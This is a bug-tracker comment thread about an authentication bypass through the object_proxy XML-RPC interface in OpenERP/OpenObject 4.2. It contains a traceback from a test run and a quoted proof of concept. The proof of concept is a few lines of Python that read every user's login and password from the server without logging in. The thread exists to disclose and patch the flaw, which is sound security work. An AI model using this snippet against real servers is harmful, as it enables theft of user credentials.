Comment 7 for bug 452373

Nhomar - Vauxoo (nhomar) wrote : Re: [Bug 452373] Re: [4.2] Netsvc object_proxy bypass

Hi....

          ./get_all_users_pass.py "nueva_2"
Traceback (most recent call last):
  File "./get_all_users_pass.py", line 27, in <module>
    db_list = dbsock.list()
  File "/usr/lib/python2.6/xmlrpclib.py", line 1199, in __call__
    return self.__send(self.__name, args)
  File "/usr/lib/python2.6/xmlrpclib.py", line 1489, in __request
    verbose=self.__verbose
  File "/usr/lib/python2.6/xmlrpclib.py", line 1237, in request
    errcode, errmsg, headers = h.getreply()
  File "/usr/lib/python2.6/httplib.py", line 1048, in getreply
    response = self._conn.getresponse()
  File "/usr/lib/python2.6/httplib.py", line 974, in getresponse
    response.begin()
  File "/usr/lib/python2.6/httplib.py", line 391, in begin
    version, status, reason = self._read_status()
  File "/usr/lib/python2.6/httplib.py", line 349, in _read_status
    line = self.fp.readline()
  File "/usr/lib/python2.6/socket.py", line 397, in readline
    data = recv(1)
socket.error: [Errno 104] Connection reset by peer

on revno: 1999

2010/4/26 Cristian Salamea (GnuThink) <email address hidden>

> Hi, I tested in stable revno. 2041 and the exploit is invalid
>
> --
> [4.2] Netsvc object_proxy bypass
> https://bugs.launchpad.net/bugs/452373
>
> Status in OpenObject Server: Invalid
>
> Bug description:
> It's possible to call any method of the object XML-RPC interface using another
> interface called object_proxy. The only requirement is that the server is
> initialized (e.g. someone does the login or tries to log in).
>
> This is solved in 5.0 but not in 4.2.
> In Bazaar, 4.2 is tagged as mature and I can't understand why this patch is
> not ported to this branch.
>
> I attach a simple patch that we use on our production servers, some of which
> are still running the 4.2 version.
>
> Proof of concept:
>
> sock = xmlrpclib.ServerProxy('http://127.0.0.1:8069/xmlrpc/object_proxy')
> ids = sock.execute('terp', 1, 'res.users', 'search', [])
> f = sock.execute('terp', 1, 'res.users', 'read', ids, ['id', 'login', 'password'])
> for u in f:
>     print ' user: %s pass: %s' % (u['login'], u['password'])
>

--
Saludos Cordiales

Nhomar G. Hernandez M.
+58-414-4110269
+58-212-6615932
+58-212-9536734 ext 124
+58-212-9512643
Web-Blog: http://geronimo.com.ve
Servicios IT: http://openerp.netquatro.com
Linux-Counter: 467724
Correos:
<email address hidden>
<email address hidden>